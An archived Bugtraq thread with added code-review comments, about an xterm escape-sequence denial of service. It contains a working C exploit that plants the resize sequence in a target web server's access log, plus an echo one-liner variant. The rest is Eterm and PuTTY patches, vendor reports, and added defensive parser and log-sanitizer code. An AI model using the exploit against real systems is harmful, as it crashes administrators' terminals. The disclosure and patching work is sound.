5153978 2000-06-02 02:28 /100 lines/ Postmaster
Recipient: Bugtraq (import) <11105>
Subject: [rootshell.com] Xterm DoS Attack
------------------------------------------------------------
X-Sender: kit@ruff
Message-ID: <Pine.LNX.4.21.0006011118280.17559-100000@ruff>
Date: Thu, 1 Jun 2000 11:21:16 -0700
Reply-To: Kit Knox <kit@ROOTSHELL.COM>
From: Kit Knox <kit@ROOTSHELL.COM>
To: BUGTRAQ@SECURITYFOCUS.COM

/*
 *
 * xterm Denial of Service Attack
 * (C) 2000 Kit Knox <kit@rootshell.com> - 5/31/2000
 *
 * Tested against: xterm (XFree86 3.3.3.1b(88b)) -- crashes
 *                 rxvt v2.6.1 -- consumes all available memory and then
 *                 crashes.
 *
 * Not vulnerable: KDE konsole 0.9.11
 *                 Secure CRT 3.0.x
 *
 *
 * By sending the VT control characters to resize a window it is possible
 * to cause an xterm to crash and in some cases consume all available
 * memory.
 *
 * This itself isn't much of a problem, except that remote users can inject
 * these control characters into your xterm in numerous ways, including:
 *
 *   o Directories and filenames on rogue FTP servers.
 *   o Rogue banner messages on ftp, telnet, mud daemons.
 *   o Log files (spoofed syslog messages, web server logs, ftp server logs)
 *
 * This sample exploit injects these control characters into a web GET
 * request. If an admin were to cat this log file, or happened to be doing
 * a "tail -f access_log" at the time of attack, they would find their
 * xterm crash.
 *
 * Embedding "ESCAPE[4;65535;65535t" (where ESCAPE is the escape character)
 * inside files, directories, etc. will have the same effect as this code.
 *
 */

#include <stdio.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>

int sock;

int main (int argc, char *argv[])
{
    struct hostent *he;
    struct sockaddr_in sa;
    char packet[1024];

    fprintf (stderr, "[ http://www.rootshell.com/ ] - xterm DoS attack - 05/31/2000.\n\n");

    if (argc != 2) {
        fprintf (stderr, "usage: %s <host/ip>\n", argv[0]);
        return (-1);
    }

    sock = socket (AF_INET, SOCK_STREAM, 0);
    if (sock < 0) {                 /* the original never checked this */
        perror ("socket");
        return (-1);
    }

    memset (&sa, 0, sizeof (sa));   /* sin_zero was left uninitialised in the original */
    sa.sin_family = AF_INET;
    sa.sin_port = htons (80);

    he = gethostbyname (argv[1]);
    if (!he) {
        if ((sa.sin_addr.s_addr = inet_addr (argv[1])) == INADDR_NONE)
            return (-1);
    } else {
        memcpy (&sa.sin_addr, he->h_addr, he->h_length);
    }

    if (connect (sock, (struct sockaddr *) &sa, sizeof (sa)) < 0) {
        fprintf (stderr, "Fatal Error: Can't connect to web server.\n");
        return (-1);
    }

    /* The request path carries the window-resize sequence CSI 4;65535;65535 t,
     * which ends up verbatim in the server's access log. */
    sprintf (packet, "GET /\033[4;65535;65535t HTTP/1.0\n\n");
    write (sock, packet, strlen (packet));
    close (sock);
    fprintf (stderr, "Done.\n");
    return 0;                       /* main fell off the end in the original */
}

(5153978) ------------------------------------------

5156308 2000-06-02 22:42 /111 lines/ Postmaster
Recipient: Bugtraq (import) <11119>
Subject: Re: [rootshell.com] Xterm DoS Attack
------------------------------------------------------------
User-Agent: Mutt/1.1.12i-CVS-2000-04-28--11:43
X-Disclaimer: I do not presume to speak for anyone but myself.
X-PGP-Key: http://www.eterm.org/mej.asc
Message-ID: <20000601192946.M6042@valinux.com>
Date: Thu, 1 Jun 2000 19:29:46 -0700
Reply-To: Michael Jennings <mej@VALINUX.COM>
From: Michael Jennings <mej@VALINUX.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <Pine.LNX.4.21.0006011118280.17559-100000@ruff>; from kit@ROOTSHELL.COM on Thu, Jun 01, 2000 at 11:21:16AM -0700

On Thursday, 01 June 2000, at 11:21:16 (-0700), Kit Knox wrote:

> * xterm Denial of Service Attack
> * (C) 2000 Kit Knox <kit@rootshell.com> - 5/31/2000
> *
> * Tested against: xterm (XFree86 3.3.3.1b(88b) -- crashes
> *                 rxvt v2.6.1 -- consumes all available memory and then
> *                 crashes.

All current versions of Eterm are vulnerable.  Attached are patches to
Eterm 0.8.10 and 0.9.  Similar changes have been committed to 0.8.11 and
0.9.1 in CVS.

Michael

--
 "Greater than the death of flesh is the death of hope, the death of
  dreams.  Against this peril we can never surrender."
                                                  -- G'Kar, Babylon 5
=======================================================================
Michael Jennings <mej@eterm.org>                    www.tcserv.com
PGP Key ID: BED09971        Software Engineer, VA Linux Systems
Author, Eterm (www.eterm.org)

[Attachment: Eterm-0.8.10-DoS.patch]

Index: src/command.c
===================================================================
RCS file: /cvs/enlightenment/Eterm/src/command.c,v
retrieving revision 1.1.1.1.2.7
diff -u -r1.1.1.1.2.7 command.c
--- src/command.c       1999/11/02 16:34:35     1.1.1.1.2.7
+++ src/command.c       2000/06/02 02:06:56
@@ -4694,6 +4694,9 @@
                 return;         /* Make sure there are 2 args left */
             y = args[++i];
             x = args[++i];
+            if (x > scr->width || y > scr->height) {
+                return;
+            }
             XResizeWindow(Xdisplay, TermWin.parent, x, y);
             break;
         case 5:
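Review bot: the new check in this hunk drops the request outright (`return;`) when `x > scr->width || y > scr->height`, whereas the 0.9 patch further down clamps with UPPER_BOUND; the two branches should agree, and clamping is the better choice since an application asking for "as large as possible" still gets a usable window instead of nothing. The check also leaves the low end open: a zero in either dimension passes `x > scr->width || y > scr->height` and reaches `XResizeWindow`, which rejects a zero width or height with a BadValue error, so `x == 0 || y == 0` should return as well (or be raised to 1).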
@@ -4713,6 +4716,9 @@
                 return;         /* Make sure there are 2 args left */
             y = args[++i];
             x = args[++i];
+            if (x > (scr->width / TermWin.fwidth) || y > (scr->height / TermWin.fheight)) {
+                return;
+            }
             XResizeWindow(Xdisplay, TermWin.parent,
                           Width2Pixel(x) + 2 * TermWin.internalBorder + (scrollbar_visible()? scrollbar_total_width() : 0),
                           Height2Pixel(y) + 2 * TermWin.internalBorder + (menubar_visible()? menuBar_TotalHeight() : 0));

[Attachment: Eterm-0.9-DoS.patch]

Index: src/term.c
===================================================================
RCS file: /cvs/enlightenment/Eterm/src/term.c,v
retrieving revision 1.33
diff -u -r1.33 term.c
--- src/term.c  2000/01/17 21:29:27     1.33
+++ src/term.c  2000/06/02 02:06:44
@@ -1232,6 +1232,8 @@
                 return;         /* Make sure there are 2 args left */
             y = args[++i];
             x = args[++i];
+            UPPER_BOUND(y, scr->height);
+            UPPER_BOUND(x, scr->width);
             XResizeWindow(Xdisplay, TermWin.parent, x, y);
 #ifdef USE_XIM
             xim_set_status_position();
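Review bot: the character-cell hunks (second hunk of Eterm-0.8.10-DoS.patch, and likewise the second hunk of Eterm-0.9-DoS.patch) bound the request by `scr->width / TermWin.fwidth` and `scr->height / TermWin.fheight`, but the `XResizeWindow` call that follows adds `2 * TermWin.internalBorder` plus the scrollbar width (and, in 0.8.10, the menubar height) on top of `Width2Pixel(x)` and `Height2Pixel(y)`, so a request exactly at the limit still yields a window larger than the screen. Either subtract the border, scrollbar and menubar from the screen size before dividing, or note in a comment that the slack is accepted.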
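Review bot: `UPPER_BOUND(y, scr->height)` in the first hunk of Eterm-0.9-DoS.patch is a macro whose definition is not in the diff; if it expands to something like `if ((y) > (lim)) (y) = (lim)` it evaluates `scr->height` twice, harmless here but worth a comment where the macro lives. More importantly it only bounds from above: a zero `x` or `y` still reaches `XResizeWindow`, which rejects a zero width or height with BadValue, so a matching lower bound of 1 (or an explicit `return` on zero) is needed alongside the two UPPER_BOUND lines.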
@@ -1254,6 +1256,8 @@
                 return;         /* Make sure there are 2 args left */
             y = args[++i];
             x = args[++i];
+            UPPER_BOUND(y, scr->height / TermWin.fheight);
+            UPPER_BOUND(x, scr->width / TermWin.fwidth);
             XResizeWindow(Xdisplay, TermWin.parent,
                           Width2Pixel(x) + 2 * TermWin.internalBorder + (scrollbar_is_visible()? scrollbar_trough_width() : 0),
                           Height2Pixel(y) + 2 * TermWin.internalBorder);

(5156308) ------------------------------------------ (Reflowed)

5158060 2000-06-04 03:07 /33 lines/ Postmaster
Recipient: Bugtraq (import) <11133>
Subject: Re: [rootshell.com] Xterm DoS Attack
------------------------------------------------------------
Message-ID: <Pine.LNX.4.21.0006021644330.17797-100000@eos13.csis.gvsu.edu>
Date: Fri, 2 Jun 2000 16:46:57 -0400
Reply-To: gavina@CSIS.GVSU.EDU
From: gavina@CSIS.GVSU.EDU
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <200006021221.WAA20903@cairo.anu.edu.au>

On Thu, 1 June 2000, Kit Knox wrote:

>
> /*
> *
> * xterm Denial of Service Attack
> * (C) 2000 Kit Knox <kit@rootshell.com> - 5/31/2000
> *
> * Tested against: xterm (XFree86 3.3.3.1b(88b) -- crashes
> *                 rxvt v2.6.1 -- consumes all available memory and then
> *                 crashes.

aterm 0.3.6 is not vulnerable.  When you cat a file containing that string,
it displays nothing.  Using a text editor, you can see the contents.

------------------------
"He who rides the pony must someday fall." - Andrew Wood

(5158060) ------------------------------------------

5158347 2000-06-04 04:20 /24 lines/ Postmaster
Recipient: Bugtraq (import) <11142>
Subject: Re: [rootshell.com] Xterm DoS Attack
------------------------------------------------------------
Message-ID: <Pine.LNX.4.21.0006022326020.5914-100000@studenternet.auc.dk>
Date: Fri, 2 Jun 2000 23:27:58 +0200
Reply-To: Soeren Staun-Pedersen <staun@ITCAMPUS.DK>
From: Soeren Staun-Pedersen <staun@ITCAMPUS.DK>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <Pine.LNX.4.04.10006012122560.5072-100000@willy.armour.cx>

> Confirmed also against Eterm 0.8.10.
>
> In fact, it took X all the way down (XFree86 4.0).

Redhat 6.0+: gnome-terminal is not vulnerable either.  Xterm is; X seems
stable though.

Soeren Staun-Pedersen - Staun@SunSITE.auc.dk
------
"The internet is full, beat it" - Me.

(5158347) ------------------------------------------

5161766 2000-06-05 04:29 /33 lines/ Postmaster
Recipient: Bugtraq (import) <11158>
Subject: Re: [rootshell.com] Xterm DoS Attack
------------------------------------------------------------
Message-ID: <200006041635.SAA07110@sebs.hans.de>
Date: Sun, 4 Jun 2000 18:35:27 +0200
Reply-To: gone@GRAFFITI.NET
From: "Hans, Sebastian" <gone@GRAFFITI.NET>
To: BUGTRAQ@SECURITYFOCUS.COM

> /*
> *
> * xterm Denial of Service Attack
> * (C) 2000 Kit Knox <kit@rootshell.com> - 5/31/2000
> *
> * Tested against: xterm (XFree86 3.3.3.1b(88b) -- crashes

snip

> * Embedding "ESCAPE[4;65535;65535t" (where escape is the escape character)
> * inside files, directories, etc will have the same effect as this code.
> *
> */

I tried this with my xterm (XFree86 3.3.3.1b(88b)) - it didn't work.
Substituting 65536 for 65535 did the job:

echo -e "\033[4;65536;65536t"

Sebastian Hans
gone@graffiti.net
--
The light at the end of the tunnel is the headlight of an approaching train.

(5161766) ------------------------------------------

5177283 2000-06-08 22:08 /100 lines/ Postmaster
Recipient: Bugtraq (import) <11219>
Subject: Re: [rootshell.com] Xterm DoS Attack
------------------------------------------------------------
Message-ID: <E12zFeu-00075I-00@ixion>
Date: Tue, 6 Jun 2000 10:28:28 +0100
Reply-To: Simon Tatham <anakin@POBOX.COM>
From: Simon Tatham <anakin@POBOX.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <m2n.12yll4-000piL@chiark.greenend.org.uk>

wakko@WTOWER.COM writes:

[xterm DoS through terminal-size sequences]
> This breaks PuTTY [a Win32 SSH client] as well.

Yesterday I checked in a fix to the PuTTY master CVS repository, and
last night's automated build ran successfully.  This morning's PuTTY
development snapshot appears to be OK.

I wasn't able to reproduce the exploit using the same escape sequence
as in the xterm-destroying example code; on the other hand, PuTTY was
vulnerable to other sequences in the same spirit.

Philosophically, I have a hard time seeing this as a bug in any given
terminal emulator.  There _should_ be a way for a (trusted) app running
in a terminal emulator to request window size changes and other such
things; it's very useful.  And in the absence of separated control and
data streams within a terminal session (in which case one could allow
`cat' unrestricted access to the data stream and it would not be able
to DoS by injecting malice into the control stream), the whole terminal
session must be considered to be the control stream, and vulnerable.
Don't `cat' untrusted files.

(Of course, APC in MS-Kermit is possibly the worst exploit of this type
I've _ever_ seen.  With a well-chosen escape sequence you could direct
the MS-Kermit program to run arbitrary commands on its host machine...)

Anyway.  Current development snapshots of PuTTY are now believed robust.
A 0.49 release containing the fix will be coming out RSN, since security
is the one thing that really makes me get off my butt and put new
releases out _quickly_ :-)

The patch is quoted below.
---------- begin patch ----------
Index: src/putty/terminal.c
===================================================================
RCS file: /home/cvs/putty/terminal.c,v
retrieving revision 1.18
retrieving revision 1.19
diff -u -r1.18 -r1.19
--- src/putty/terminal.c        2000/03/17 10:46:59     1.18
+++ src/putty/terminal.c        2000/06/05 16:33:58     1.19
@@ -1209,7 +1209,11 @@
              */
             compatibility(VT340TEXT);
             if (esc_nargs<=1 && (esc_args[0]<1 || esc_args[0]>=24)) {
-                request_resize (cols, def(esc_args[0], 24), 0);
+                unsigned int newrows = def(esc_args[0], 24);
+                /* Hack: prevent big-resize DoS attack. */
+                if (newrows > max(512, cfg.height))
+                    newrows = max(512, cfg.height);
+                request_resize (cols, newrows, 0);
                 deselect();
             }
             break;
@@ -1221,7 +1225,11 @@
              */
             compatibility(VT420);
             if (esc_nargs==1 && esc_args[0]>=24) {
-                request_resize (cols, def(esc_args[0], cfg.height), 0);
+                unsigned int newrows = def(esc_args[0], cfg.height);
+                /* Hack: prevent big-resize DoS attack. */
+                if (newrows > max(512, cfg.height))
+                    newrows = max(512, cfg.height);
+                request_resize (cols, newrows, 0);
                 deselect();
             }
             break;
@@ -1232,7 +1240,11 @@
              */
             compatibility(VT340TEXT);
             if (esc_nargs<=1) {
-                request_resize (cols, def(esc_args[0], cfg.width), 0);
+                unsigned int newcols = def(esc_args[0], cfg.width);
+                /* Hack: prevent big-resize DoS attack. */
+                if (newcols > max(512, cfg.width))
+                    newcols = max(512, cfg.width);
+                request_resize (newcols, rows, 0);
                 deselect();
             }
             break;
----------- end patch -----------

Cheers,
Simon
--
Simon Tatham         "infinite loop _see_ loop, infinite"
<anakin@pobox.com>     - Index, Borland Pascal Language Guide

(5177283) ------------------------------------------
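Review bot: the cap `max(512, cfg.height)` is computed twice in the first hunk and the same five lines are then copied into the other two, so the limit lives in three places; a small helper (clamp rows against `cfg.height`, columns against `cfg.width`) would keep it in one, and would give the "Hack:" comment somewhere to say why 512 was chosen as the floor of the ceiling. `max` is also not standard C; if it is a macro that expands its arguments twice that is harmless here, but worth confirming in the project's headers.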
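Review bot: the third hunk changes more than the clamp. The removed line, `request_resize (cols, def(esc_args[0], cfg.width), 0);`, passed the requested width as the row argument, while the replacement `request_resize (newcols, rows, 0);` passes it as the column count and keeps the current rows. That is a separate behaviour fix and deserves its own sentence in the commit message, since a reader looking only for the DoS cap will not notice that column-resize sequences were previously changing the row count.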
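All three patches in this thread take the same shape: read the two size parameters of the CSI ... t window-manipulation sequence, then clamp (Eterm 0.9, PuTTY) or reject (Eterm 0.8.10) anything larger than the display. The following C program is an added example written for this page; it is not code from xterm, Eterm or PuTTY. It parses a resize request, refuses a zero dimension (which XResizeWindow would reject with BadValue), and clamps oversized values to assumed display limits. MAX_PIXEL_W, MAX_PIXEL_H, CELL_W and CELL_H are hypothetical constants standing in for the screen and font geometry an emulator would query. It goes one step beyond the patches by handling both the pixel form (4) and the character-cell form (8) in one parser.

```c
#include <stdio.h>
#include <string.h>

/* Assumed display geometry (hypothetical values for this example; a real
 * emulator would query the X screen and its font, as Eterm does through
 * scr->width and TermWin.fwidth). */
#define MAX_PIXEL_W 2048
#define MAX_PIXEL_H 1536
#define CELL_W 8
#define CELL_H 16

struct resize_req {
    int kind;       /* first parameter: 4 = pixels, 8 = character cells */
    unsigned w, h;  /* clamped width/height, in pixels or cells depending on kind */
    int valid;      /* 1 if the request may be handed to the window system */
};

static unsigned clamp_to(unsigned long v, unsigned limit)
{
    return v > limit ? limit : (unsigned)v;
}

/* Parse "ESC [ Ps ; Ph ; Pw t" at the start of s.  Returns the number of
 * bytes consumed, or 0 if s does not start with such a sequence.  A sequence
 * that parses but is not a usable resize (other Ps values, or a zero
 * dimension) is consumed with valid == 0; oversized dimensions are clamped
 * rather than dropped, following the Eterm 0.9 and PuTTY patches.
 * Simplification: xterm gives an omitted or zero parameter a special meaning
 * (current size / display size); here both are rejected. */
size_t parse_resize(const char *s, struct resize_req *out)
{
    unsigned long p[3] = {0, 0, 0};
    int np = 0;
    size_t i = 2;

    memset(out, 0, sizeof *out);
    if (s[0] != '\033' || s[1] != '[')
        return 0;
    for (;;) {
        if (np >= 3)
            return 0;                     /* more parameters than a resize takes */
        while (s[i] >= '0' && s[i] <= '9') {
            if (p[np] < 100000UL)         /* saturate: anything this large is clamped anyway */
                p[np] = p[np] * 10 + (unsigned long)(s[i] - '0');
            i++;
        }
        np++;
        if (s[i] == ';') { i++; continue; }
        if (s[i] == 't') { i++; break; }
        return 0;                         /* some other CSI sequence, or garbage */
    }

    out->kind = (int)p[0];
    if (p[1] == 0 || p[2] == 0)
        return i;                         /* XResizeWindow refuses a zero dimension (BadValue) */
    if (p[0] == 4) {                      /* CSI 4 ; height ; width t : pixels */
        out->h = clamp_to(p[1], MAX_PIXEL_H);
        out->w = clamp_to(p[2], MAX_PIXEL_W);
        out->valid = 1;
    } else if (p[0] == 8) {               /* CSI 8 ; rows ; cols t : character cells */
        out->h = clamp_to(p[1], MAX_PIXEL_H / CELL_H);
        out->w = clamp_to(p[2], MAX_PIXEL_W / CELL_W);
        out->valid = 1;
    }
    return i;
}

int main(void)
{
    /* The first sample is the sequence from this thread; the rest are constructed. */
    const char *samples[] = { "\033[4;65535;65535t", "\033[8;24;80t", "\033[4;0;100t", "\033[2J" };
    for (size_t k = 0; k < sizeof samples / sizeof samples[0]; k++) {
        struct resize_req r;
        size_t n = parse_resize(samples[k], &r);
        printf("consumed=%zu kind=%d valid=%d h=%u w=%u\n", n, r.kind, r.valid, r.h, r.w);
    }
    return 0;
}
```

The saturating parse matters as much as the clamp: the thread shows 65535 and 65536 behaving differently in one xterm build, which is the signature of a 16-bit truncation somewhere between the parser and the X request, and a parser that keeps accumulating digits into a fixed-width integer reintroduces exactly that class of surprise.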
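Simon Tatham's closing advice, don't `cat' untrusted files, has a mechanical counterpart on the viewing side: render control bytes instead of passing them to the terminal, the way `cat -v` does. The following C code is an added example and not part of the thread. sanitize_for_tty() rewrites ESC and the other C0 controls into caret notation so that a log line carrying Kit Knox's sequence is displayed rather than interpreted, and has_raw_controls() is the cheap check a log pipeline or monitoring script can run to flag such lines for attention. The Apache-style access-log line, its address and its timestamp are constructed for the example.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Constructed sample: an Apache-style access-log line whose request path
 * carries the resize sequence from this thread (ESC [ 4 ; 65535 ; 65535 t).
 * The client address and timestamp are invented for the example. */
static const char SAMPLE_LOG_LINE[] =
    "198.51.100.7 - - [02/Jun/2000:10:00:00 -0700] "
    "\"GET /\033[4;65535;65535t HTTP/1.0\" 404 -";

/* Returns 1 if the line contains any byte a terminal would interpret rather
 * than print: a C0 control other than newline and tab, or DEL.  This is the
 * check a log viewer or forwarder can apply before handing text to a tty. */
int has_raw_controls(const char *line)
{
    for (const unsigned char *p = (const unsigned char *)line; *p; p++) {
        if (*p == '\n' || *p == '\t')
            continue;
        if (*p < 0x20 || *p == 0x7f)
            return 1;
    }
    return 0;
}

/* Rewrite untrusted bytes in caret notation, as "cat -v" does: ESC (0x1b)
 * becomes "^[", DEL becomes "^?", the other C0 controls become "^@".."^_";
 * newline and tab pass through unchanged.  Bytes 0x80 and above are copied
 * as they are so UTF-8 text survives (an 8-bit terminal that treats
 * 0x80-0x9f as C1 controls would need them escaped too).  Returns the full
 * sanitized length, like snprintf; out is truncated and NUL-terminated when
 * outcap is too small. */
size_t sanitize_for_tty(const char *in, size_t n, char *out, size_t outcap)
{
    size_t w = 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)in[i];
        char rep[2];
        size_t len = 1;
        rep[0] = (char)c;
        if (!(c == '\n' || c == '\t' || (c >= 0x20 && c != 0x7f))) {
            rep[0] = '^';
            rep[1] = (c == 0x7f) ? '?' : (char)(c + 0x40);
            len = 2;
        }
        for (size_t k = 0; k < len; k++, w++)
            if (w + 1 < outcap)           /* keep one byte for the terminator */
                out[w] = rep[k];
    }
    if (outcap)
        out[w < outcap ? w : outcap - 1] = '\0';
    return w;
}

int main(void)
{
    char out[256];
    printf("raw controls present: %d\n", has_raw_controls(SAMPLE_LOG_LINE));
    sanitize_for_tty(SAMPLE_LOG_LINE, strlen(SAMPLE_LOG_LINE), out, sizeof out);
    printf("%s\n", out);
    return 0;
}
```

Running it prints the log line with `^[[4;65535;65535t` where the live escape used to be, which is what an administrator doing `tail -f access_log` should be looking at; the same filter belongs in front of any path where remote-controlled text (FTP listings, banners, syslog) reaches a terminal.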